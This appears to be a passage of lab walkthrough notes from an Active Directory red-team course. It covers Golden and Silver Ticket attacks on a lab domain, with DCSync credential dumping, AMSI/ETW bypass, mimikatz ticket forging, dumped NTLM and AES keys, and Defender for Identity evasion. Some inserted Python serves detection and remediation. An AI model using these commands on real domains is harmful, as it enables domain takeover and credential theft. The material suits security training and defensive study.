6igr5vZysU5TQxvibzchqE7N8u1W307yrRbU3klOnWqmqu4N98Nn3GdWDZ4c1Yvb15pAChR38PBV5a9s
TSYSXpAqbJHovdfqa8vQJFVDinMCTDOuepUg4gP/qSMFee/OJM1jp3NvP+Ya9hvoZHW3w1jlP44cwcq7
aJJyeKWPsLDwo4pUnF3kK3fl57sdOnyeOixlIgwU/CRqrTB6thtJtoC6aLMcDpCIPlXgzc5ihkmw3sT6
pq1jucgP0IL1wG9pfEEUiZ+B9sd41vbS+EhlLrK8ZQ8HWPNkG+xBYY8icKGYqL6enIrIycsbCVzkCIGa
hwkdz5lavl5PbNfMPNkGsHBizkZTdjEK3v/o92ViRpLA4eC4BNdksb+A1rS7fkRrZ4K1YJliGNugTMvk
RN9AmQxOfhFFc0VpnXnjVDaSlh0sOgkNJWz9AFZbS77kut/Ixp+ad2qPPs5r2E7yqt0yEhvFq3nijtIJ
nY234KCIq8PZ6BePtZoY4UqF3hGNAsa+NVwk3UYr79Fjuo4Y3qOGYbrhB/zGPk9KiExXiL/hBrPGx44w
RAd1GV2P73XnjGPPqwaH1dymd9AAZHZTAK+Bl+0G5OkQjuqB8m4FlRGw+bv83OEKPK8qyqGeQx5tfagz
e1ByZ9r43FzALBEhzzhWsAeMUnHR0kv9adC3Me2FNJZOvv/+AKTXCpdXhtuDde6fF/id0DIcncoIidm+
iB0OEfEVaXfPOTOTLB4kK5gcttu8Ef5vFbIpSZTMYZX409E4tQXQr1Bu7r8Any8OYINIPpStMPJ91FZ+
NhEs04eL3q14yM1v+RsputoHsA/8VHbuSngru1Y1jKyunrNSaaJ4CkoPxX33FUyLRBGnYOFbApTY0t4c
mLIB+CSXqxK+LtQ3SnLgg3hQVOZknn1mXzGiGC6FMS02jbDHZJaWu6aqDL9q96O74l++yo4mfjp5Nmmt
bI9elmvzbNr82CUWJJoJz5+qzlHearjhXWTk4T/LRSyKstGebtgnP5MghWWPqrog/VBkUzT3CJp7Gu3U
QTQe7wdGijy3v0lWyd7sSBOC3EsJEk3JOd+IBOvvflZJNCRWY2Gma3eh1Y17ARJ5nPH/7Cb6o/8hH+D8
d2g09EpWM6hldKpb6h4BzPTfRP2w44UG+JUU87hmLq4vU9hiQYQSv+LZ7uxMR1MyeNCYOvApsWRheAUY
8Enqu+qhN86jggEwMIIBLKADAgEAooIBIwSCAR99ggEbMIIBF6CCARMwggEPMIIBC6ArMCmgAwIBEqEi
BCDw0ChP933+UBafQ1AZxvDoDubs3JvlVevSjCpUHSKPsqEcGxpET0xMQVJDT1JQLk1PTkVZQ09SUC5M
T0NBTKIaMBigAwIBAaERMA8bDUFkbWluaXN0cmF0b3KjBwMFAEDgAACkERgPMjAyNDA2MjgxMjQxMjZa
pREYDzIwMjQwNjI4MTI0MTI2WqYRGA8yMDI0MDYyODIyNDEyNlqnERgPMjAyNDA3MDUxMjQxMjZaqBwb
GkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMqS8wLaADAgECoSYwJBsGa3JidGd0Gxpkb2xsYXJjb3Jw
Lm1vbmV5Y29ycC5sb2NhbA==

[+] Ticket successfully imported!


C:\Windows\system32>
C:\Windows\system32>klist

Current LogonId is 0:0x1f7ba7

Cached Tickets: (1)

#0> Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL


Server: krbtgt/dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 6/28/2024 5:41:26 (local)
End Time: 6/28/2024 15:41:26 (local)
Renew Time: 7/5/2024 5:41:26 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

C:\Windows\system32>dir \\dcorp-dc\C$\
Volume in drive \\dcorp-dc\C$ has no label.
Volume Serial Number is 1A5A-FDE2

Directory of \\dcorp-dc\C$

05/08/2021 01:20 AM <DIR> PerfLogs


11/14/2022 11:12 PM <DIR> Program Files
05/08/2021 02:40 AM <DIR> Program Files (x86)
05/18/2024 01:32 AM <DIR> Users
01/10/2024 01:59 AM <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 6,428,753,920 bytes free

Persistence
Once a Golden Ticket is created and used, the attacker can:

• Maintain Long-Term Access: Golden Tickets can have very long lifetimes, providing extended
access, since the KRBTGT password is changed very rarely.

• Bypass Password Changes: Even if user account passwords are changed, the Golden Ticket
remains valid until the KRBTGT password is changed.

• Impersonate Any User: The attacker can forge TGTs for any user, giving them flexibility in their
attacks.

To invalidate any existing Golden Tickets, the KRBTGT password must be changed twice: password history is
maintained for the account, so the KDC still accepts tickets encrypted with the previous krbtgt key after a
single reset.
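The reason two resets are needed can be shown with a small model of the KDC's key history. This is an added example, not part of the lab notes or any real KDC code: the key material and the "ticket" are constructed, and HMAC-SHA256 stands in for the real ticket encryption and PAC checksum. The model keeps the current krbtgt key and one previous key, exactly as the password history described above does, and counts how many resets it takes before a ticket made with a copy of the original key is refused.

```python
"""Why a golden ticket survives one KRBTGT reset but not two.

Added example (not part of the original lab notes). Toy model: the KDC
verifies a TGT with the current krbtgt key and, failing that, with the
previous one, so that tickets issued just before a reset keep working.
"""
import hashlib
import hmac
import os


def ticket_under_key(key, principal):
    """Toy TGT: the principal name plus a MAC computed with the krbtgt key."""
    return principal, hmac.new(key, principal.encode(), hashlib.sha256).digest()


class ToyKdc:
    """Holds the current krbtgt key and the single previous key (password history)."""

    def __init__(self):
        self.current = os.urandom(32)   # constructed key, stands in for the krbtgt AES key
        self.previous = None

    def reset_krbtgt(self):
        """A krbtgt password change: the old key moves into history."""
        self.previous, self.current = self.current, os.urandom(32)

    def issue_tgt(self, principal):
        return ticket_under_key(self.current, principal)

    def accepts(self, tgt):
        """True if the ticket verifies under the current or the previous key."""
        principal, tag = tgt
        for key in (self.current, self.previous):
            if key is not None and hmac.compare_digest(ticket_under_key(key, principal)[1], tag):
                return True
        return False


def resets_needed_to_invalidate():
    """Resets required before a ticket built with a copy of today's key is refused."""
    kdc = ToyKdc()
    copied_key = kdc.current                     # what a DCSync of krbtgt gives an attacker
    golden = ticket_under_key(copied_key, "Administrator")
    resets = 0
    while kdc.accepts(golden):
        kdc.reset_krbtgt()
        resets += 1
    return resets


def legitimate_ticket_survives_resets(n):
    """Why history exists: a TGT issued just before a reset stays usable for one reset only."""
    kdc = ToyKdc()
    tgt = kdc.issue_tgt("student161")
    for _ in range(n):
        kdc.reset_krbtgt()
    return kdc.accepts(tgt)


if __name__ == "__main__":
    print("resets needed:", resets_needed_to_invalidate())
    print("legit TGT after 1 reset:", legitimate_ticket_survives_resets(1))
    print("legit TGT after 2 resets:", legitimate_ticket_survives_resets(2))
```

The same model shows the operational caveat: doing both resets back to back also invalidates every legitimately issued TGT, so in practice the two resets are spaced apart long enough for replication to complete and for outstanding tickets to be renewed.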

Silver ticket attack


A Silver Ticket attack is a type of Kerberos attack where an attacker forges service tickets (TGS) rather than
Ticket Granting Tickets (TGT). This allows the attacker to access specific services without needing to
interact with the domain controller, making it a stealthier attack compared to Golden Ticket attacks. Silver
Tickets can be used to authenticate to any service that uses Kerberos for authentication, such as MSSQL,
HTTP, or CIFS.

The attack requires the NTLM hash (or password) of the service account that the target service runs under. We
also need the Service Principal Name (SPN) of the service we are targeting.

Stealthiness of Silver Tickets


Silver Ticket attacks can be highly stealthy, especially when compared to other types of attacks on an
Active Directory (AD) environment. Microsoft Defender for Identity (MDI) and other detection tools may
not always detect these attacks due to their nature.

Service-Specific Tickets
• Silver Tickets are created for specific services (e.g., CIFS, HTTP) and do not require communication
with a Domain Controller (DC) to be used.

• This reduces the likelihood of detection by security monitoring tools that track DC interactions.

Limited Scope
• Unlike Golden Tickets, which provide unrestricted access across the domain, Silver Tickets are
limited to specific services on specific machines.

• This limitation inherently makes them less suspicious and harder to detect.

Avoiding Domain Controller Logs


• Since Silver Tickets do not need to interact with the Key Distribution Center (KDC) on the DC for
validation, they avoid generating logs and alerts that would typically be associated with Kerberos
ticket activity.

MDI Evasion
• Microsoft Defender for Identity primarily monitors authentication traffic and anomalies at the DC
level.

• By using Silver Tickets, attackers can access services on a domain controller without triggering the
same level of scrutiny as they would with a Golden Ticket.
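
As an added example that is not part of the original notes: a defender-side correlation in Python implementing the two traces a Silver Ticket leaves, a Kerberos network logon (event 4624) on the target host with no matching service-ticket issuance (event 4769) on any DC, and an RC4 ticket presented to a host whose machine account holds AES keys. The event records, user names, timestamps and policy values are constructed; only the DC name is the lab's.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta

# Encryption-type values Windows writes into the Kerberos fields of 4769/4624.
RC4_HMAC_NT = 0x17           # RSADSI RC4-HMAC(NT), what a ticket forged with /rc4 uses
AES256_CTS_HMAC_SHA1 = 0x12  # AES-256-CTS-HMAC-SHA1-96


@dataclass
class TgsIssued:
    """Constructed stand-in for event 4769 (service ticket requested) on a DC."""
    time: datetime
    user: str
    service: str   # SPN the ticket was issued for, e.g. CIFS/dcorp-dc.dollarcorp.moneycorp.local
    etype: int


@dataclass
class HostLogon:
    """Constructed stand-in for event 4624 (logon) on the host that accepted the ticket."""
    time: datetime
    user: str
    host: str           # FQDN of the host writing the event
    logon_type: int     # 3 = network logon, which an SMB (CIFS) session produces
    auth_package: str   # "Kerberos" or "NTLM"
    etype: int          # encryption type of the presented ticket (0 for NTLM logons)


@dataclass
class KerberosPolicy:
    """The two (Get-DomainPolicyData).KerberosPolicy fields that bound a service ticket."""
    max_service_age_min: int   # MaxServiceAge, in minutes
    max_renew_age_days: int    # MaxRenewAge, in days


def ticket_within_policy(start: datetime, end: datetime, renew_till: datetime,
                         policy: KerberosPolicy) -> bool:
    """True when the ticket's lifetime and renew window fit the domain policy.

    A forger who copies the policy into /endin and /renewmax passes this check,
    so lifetime alone is not a usable Silver Ticket indicator; it only catches
    careless over-long tickets.
    """
    return (end - start <= timedelta(minutes=policy.max_service_age_min)
            and renew_till - start <= timedelta(days=policy.max_renew_age_days))


def find_silver_ticket_indicators(logons, issued, aes_only_hosts=frozenset(),
                                  window=timedelta(minutes=10)):
    """Return (logon, [reasons]) for Kerberos network logons that look forged.

    Indicator 1: no DC logged a 4769 for this user and this host's SPN shortly
    before the logon, the direct consequence of the KDC never being contacted.
    Indicator 2: the ticket is RC4 although the host's machine account holds
    AES keys, the downgrade a forger who only has the NTLM hash is pushed into.
    """
    findings = []
    for lg in logons:
        if lg.logon_type != 3 or lg.auth_package.lower() != "kerberos":
            continue
        reasons = []
        matching_4769 = [
            t for t in issued
            if t.user.lower() == lg.user.lower()
            and t.service.split("/", 1)[-1].lower() == lg.host.lower()
            and lg.time - window <= t.time <= lg.time
        ]
        if not matching_4769:
            reasons.append("no 4769 from any DC for this user/SPN within the window")
        if lg.etype == RC4_HMAC_NT and lg.host.lower() in aes_only_hosts:
            reasons.append("RC4 ticket for a host whose machine account holds AES keys")
        if reasons:
            findings.append((lg, reasons))
    return findings


# --- constructed sample data (lab DC name; users and timestamps are invented) ---
DC = "dcorp-dc.dollarcorp.moneycorp.local"
T0 = datetime(2024, 6, 28, 7, 10, 45)
POLICY = KerberosPolicy(max_service_age_min=600, max_renew_age_days=7)
AES_ONLY_HOSTS = frozenset({DC})

# One legitimate CIFS ticket issued by the DC, to svcadmin.
ISSUED = [TgsIssued(T0 - timedelta(minutes=2), "svcadmin", f"CIFS/{DC}", AES256_CTS_HMAC_SHA1)]
LOGONS = [
    HostLogon(T0 - timedelta(minutes=1), "svcadmin", DC, 3, "Kerberos", AES256_CTS_HMAC_SHA1),  # legitimate
    HostLogon(T0, "administrator", DC, 3, "Kerberos", AES256_CTS_HMAC_SHA1),                   # forged with AES key
    HostLogon(T0 + timedelta(minutes=33), "administrator", DC, 3, "Kerberos", RC4_HMAC_NT),    # forged with NTLM hash
    HostLogon(T0 + timedelta(minutes=5), "jdoe", DC, 3, "NTLM", 0),                            # NTLM logon, ignored
]

# Lifetimes of a ticket forged with /endin:600 /renewmax:10080, and an over-long one.
TICKET_START, TICKET_END, TICKET_RENEW = T0, T0 + timedelta(hours=10), T0 + timedelta(days=7)
OVERLONG_END = T0 + timedelta(hours=11)

if __name__ == "__main__":
    for lg, reasons in find_silver_ticket_indicators(LOGONS, ISSUED, AES_ONLY_HOSTS):
        print(f"{lg.time:%H:%M:%S} {lg.user}@{lg.host}: {'; '.join(reasons)}")
    print("policy-conformant forged ticket passes lifetime check:",
          ticket_within_policy(TICKET_START, TICKET_END, TICKET_RENEW, POLICY))
```

In production the 4769 set comes from every DC in the domain, since a legitimate ticket may be issued by any of them; only the absence across all DCs is the indicator.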

Dumping Credentials of the service accounts


Since CIFS, WMI and PowerShell remoting use the local machine account as their service account, we will dump the hashes of the Domain Controller’s machine account.

Dumping NTLM Hashes


We have already dumped all the hashes from the Domain Controller; refer to the section Dumping All the Hashes from Domain Controller. From the output of that command, the NTLM hash of the Domain Controller’s machine account can be obtained.
RID : 000003e8 (1000)
User : DCORP-DC$
LM :
NTLM : 81a9ccc2f44b988af78448ad78297ad5
Dumping AES Keys
If we want the AES keys instead, we can run a DCSync attack against the machine account of the Domain Controller.

Opening a command prompt with Domain Administrator (svcadmin) privileges.


C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin
/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec
/createnetonly:cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True


[*] Username : NREMAWFI
[*] Domain : 8N5W5RXM
[*] Password : 8QC3E8E0
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 1928
[+] LUID : 0x37f8e4

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)


[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash:
6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 3668196
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

[*] Target LUID: 0x37f8e4
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 6/28/2024 6:55:16 AM
EndTime : 6/28/2024 4:55:16 PM
RenewTill : 7/5/2024 6:55:16 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : iRGBk/LqgAnl3LG08+WDSFl189UDvEJzRA7LJv+2Za4=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

Executing the DCSync attack to get the AES key of the machine account.
C:\Windows\system32>C:\AD\Tools\Loader.exe -Path "C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe"
"lsadump::dcsync /user:DCORP-DC$" "exit"
[+] Successfully unhooked ETW!
[+] Successfully patched AMSI!
[+] URL/PATH : C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe Arguments :
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and
@Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # -Path
ERROR mimikatz_doLocal ; "-Path" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz


cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe
ERROR mimikatz_doLocal ; "C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe" command of "standard"
module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz


cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # lsadump::dcsync /user:DCORP-DC$


[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'DCORP-DC$' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : DCORP-DC

** SAM ACCOUNT **

SAM Username : DCORP-DC$


Account Type : 30000001 ( MACHINE_ACCOUNT )
User Account Control : 00082000 ( SERVER_TRUST_ACCOUNT TRUSTED_FOR_DELEGATION )
Account expiration :
Password last change : 6/13/2024 9:01:43 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-1000
Object Relative ID : 1000

Credentials:
Hash NTLM: 81a9ccc2f44b988af78448ad78297ad5

Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALhostdcorp-dc.dollarcorp.moneycorp.local
Default Iterations : 4096
Credentials
aes256_hmac (4096) : e4a24a0b2f58786711c6f8a983bf5a1e00eaf160fcdc2b4225825711b99cf5af
aes128_hmac (4096) : 58d5e06f54d9304b1f59a439bd09ad32
des_cbc_md5 (4096) : f2eac7583ef7ab3d
OldCredentials
aes256_hmac (4096) : 2b2945ed11f042b333128ab628bb9b98308e11e67284d45575adcabd99010af1
aes128_hmac (4096) : 109e8cf66e910bfa8ee723280b2ca82a
des_cbc_md5 (4096) : d0320ea8c104cbb6
OlderCredentials
aes256_hmac (4096) : cc7aedfa48a39e7dd1a56f05e0ef4dba84fc87b77a975b96eb35d7cc0ebafe3a
aes128_hmac (4096) : 6506078bdd0829205d3b1685f8413aa3
des_cbc_md5 (4096) : b526f41ab5b95113

* Primary:Kerberos *
Default Salt : DOLLARCORP.MONEYCORP.LOCALhostdcorp-dc.dollarcorp.moneycorp.local
Credentials
des_cbc_md5 : f2eac7583ef7ab3d
OldCredentials
des_cbc_md5 : d0320ea8c104cbb6

* Packages *
NTLM-Strong-NTOWF

* Primary:WDigest *

mimikatz(commandline) # exit
Bye!

NTLM Hash - 81a9ccc2f44b988af78448ad78297ad5

AES Hash - e4a24a0b2f58786711c6f8a983bf5a1e00eaf160fcdc2b4225825711b99cf5af

Execution
We will access the CIFS service on the domain controller. CIFS is the file system service, which provides access to all files stored on the computer. Microsoft’s documentation describes the other services that run on Windows operating systems.

Using Invoke-Mimi
AES Hash
Invoke-Mimi -Command '"kerberos::golden /User:<user to impersonate> /domain:<Domain> /sid:<Domain
SID> /target:<target machine containing the service> /service:<service> /aes256:<hash of the
service account> /startoffset:0 /endin:<Ticketlifetime> /renewmax:<Renewaltime> /ptt"'

C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> . C:\Ad\Tools\Invoke-MimiEx.ps1
PS C:\Windows\system32> . C:\Ad\Tools\PowerView.ps1
PS C:\Windows\system32> Get-DomainSID
S-1-5-21-719815819-3726368948-3917688648
PS C:\Windows\system32> (Get-DomainPolicyData).KerberosPolicy

MaxTicketAge : 10
MaxRenewAge : 7
MaxServiceAge : 600
MaxClockSkew : 5
TicketValidateClient : 1
PS C:\Windows\system32> ls \\dcorp-dc.dollarcorp.moneycorp.local\C$\
ls : Access is denied
At line:1 char:1
+ ls \\dcorp-dc.dollarcorp.moneycorp.local\C$\
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (\\dcorp-dc.doll...ycorp.local\C$\:String) [Get-
ChildItem], Unauthoriz
edAccessException
+ FullyQualifiedErrorId :
ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand

ls : Cannot find path '\\dcorp-dc.dollarcorp.moneycorp.local\C$\' because it does not exist.


At line:1 char:1
+ ls \\dcorp-dc.dollarcorp.moneycorp.local\C$\
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (\\dcorp-dc.doll...ycorp.local\C$\:String) [Get-
ChildItem], ItemNotFound
Exception
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand
PS C:\Windows\system32> Invoke-Mimi -Command '"kerberos::golden /User:administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS /aes256:e4a24a0b2f58786711c6f8a983bf5a1e00eaf160fcdc2b4225825711b99cf5af /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # kerberos::golden /User:administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS /aes256:e4a24a0b2f58786711c6f8a983bf5a1e00eaf160fcdc2b4225825711b99cf5af /startoffset:0 /endin:600 /renewmax:10080 /ptt
User : administrator
Domain : dollarcorp.moneycorp.local (DOLLARCORP)
SID : S-1-5-21-719815819-3726368948-3917688648
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: e4a24a0b2f58786711c6f8a983bf5a1e00eaf160fcdc2b4225825711b99cf5af - aes256_hmac
Service : CIFS
Target : dcorp-dc.dollarcorp.moneycorp.local
Lifetime : 6/28/2024 7:10:45 AM ; 6/28/2024 5:10:45 PM ; 7/5/2024 7:10:45 AM
-> Ticket : ** Pass The Ticket **

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Golden ticket for 'administrator @ dollarcorp.moneycorp.local' successfully submitted for current session
PS C:\Windows\system32> klist

Current LogonId is 0:0x3b08b7

Cached Tickets: (1)

#0> Client: administrator @ dollarcorp.moneycorp.local


Server: CIFS/dcorp-dc.dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 6/28/2024 7:10:45 (local)
End Time: 6/28/2024 17:10:45 (local)
Renew Time: 7/5/2024 7:10:45 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:
PS C:\Windows\system32> ls \\dcorp-dc.dollarcorp.moneycorp.local\C$\

Directory: \\dcorp-dc.dollarcorp.moneycorp.local\C$

Mode LastWriteTime Length Name


---- ------------- ------ ----
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 11/14/2022 10:12 PM Program Files
d----- 5/8/2021 2:40 AM Program Files (x86)
d-r--- 5/18/2024 1:32 AM Users
d----- 1/10/2024 12:59 AM Windows

NTLM Hash
Invoke-Mimi -Command '"kerberos::golden /User:<user to impersonate> /domain:<Domain> /sid:<Domain
SID> /target:<target machine containing the service> /service:<service> /rc4:<hash of the service
account> /startoffset:0 /endin:<Ticketlifetime> /renewmax:<Renewaltime> /ptt"'

C:\Windows\system32>C:\AD\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\system32> ls \\dcorp-dc.dollarcorp.moneycorp.local\C$\
ls : Access is denied
At line:1 char:1
+ ls \\dcorp-dc.dollarcorp.moneycorp.local\C$\
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (\\dcorp-dc.doll...ycorp.local\C$\:String) [Get-
ChildItem], Unauthoriz
edAccessException
+ FullyQualifiedErrorId :
ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand

ls : Cannot find path '\\dcorp-dc.dollarcorp.moneycorp.local\C$\' because it does not exist.


At line:1 char:1
+ ls \\dcorp-dc.dollarcorp.moneycorp.local\C$\
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (\\dcorp-dc.doll...ycorp.local\C$\:String) [Get-
ChildItem], ItemNotFound
Exception
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand
PS C:\Windows\system32> . C:\Ad\Tools\Invoke-MimiEx.ps1
PS C:\Windows\system32> Invoke-Mimi -Command '"kerberos::golden /User:administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:cifs /rc4:81a9ccc2f44b988af78448ad78297ad5 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # kerberos::golden /User:administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:cifs /rc4:81a9ccc2f44b988af78448ad78297ad5 /startoffset:0 /endin:600 /renewmax:10080 /ptt
User : administrator
Domain : dollarcorp.moneycorp.local (DOLLARCORP)
SID : S-1-5-21-719815819-3726368948-3917688648
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 81a9ccc2f44b988af78448ad78297ad5 - rc4_hmac_nt
Service : cifs
Target : dcorp-dc.dollarcorp.moneycorp.local
Lifetime : 6/28/2024 7:43:40 AM ; 6/28/2024 5:43:40 PM ; 7/5/2024 7:43:40 AM
-> Ticket : ** Pass The Ticket **

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Golden ticket for 'administrator @ dollarcorp.moneycorp.local' successfully submitted for current session

PS C:\Windows\system32> klist

Current LogonId is 0:0x466574

Cached Tickets: (1)

#0> Client: administrator @ dollarcorp.moneycorp.local


Server: cifs/dcorp-dc.dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 6/28/2024 7:43:40 (local)
End Time: 6/28/2024 17:43:40 (local)
Renew Time: 7/5/2024 7:43:40 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:

PS C:\Windows\system32> ls \\dcorp-dc.dollarcorp.moneycorp.local\C$\

Directory: \\dcorp-dc.dollarcorp.moneycorp.local\C$

Mode LastWriteTime Length Name


---- ------------- ------ ----
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 11/14/2022 10:12 PM Program Files
d----- 5/8/2021 2:40 AM Program Files (x86)
d-r--- 5/18/2024 1:32 AM Users
d----- 1/10/2024 12:59 AM Windows

Using BetterSafetyKatz
AES Hash
BetterSafetyKatz.exe "kerberos::golden /User:<user to impersonate> /domain:<Domain> /sid:<Domain
SID> /target:<target machine containing the service> /service:<service> /aes256:<hash of the
service account> /startoffset:0 /endin:<Ticketlifetime> /renewmax:<Renewaltime> /ptt" "exit"

C:\Windows\system32>dir \\dcorp-dc.dollarcorp.moneycorp.local\C$\
Access is denied.

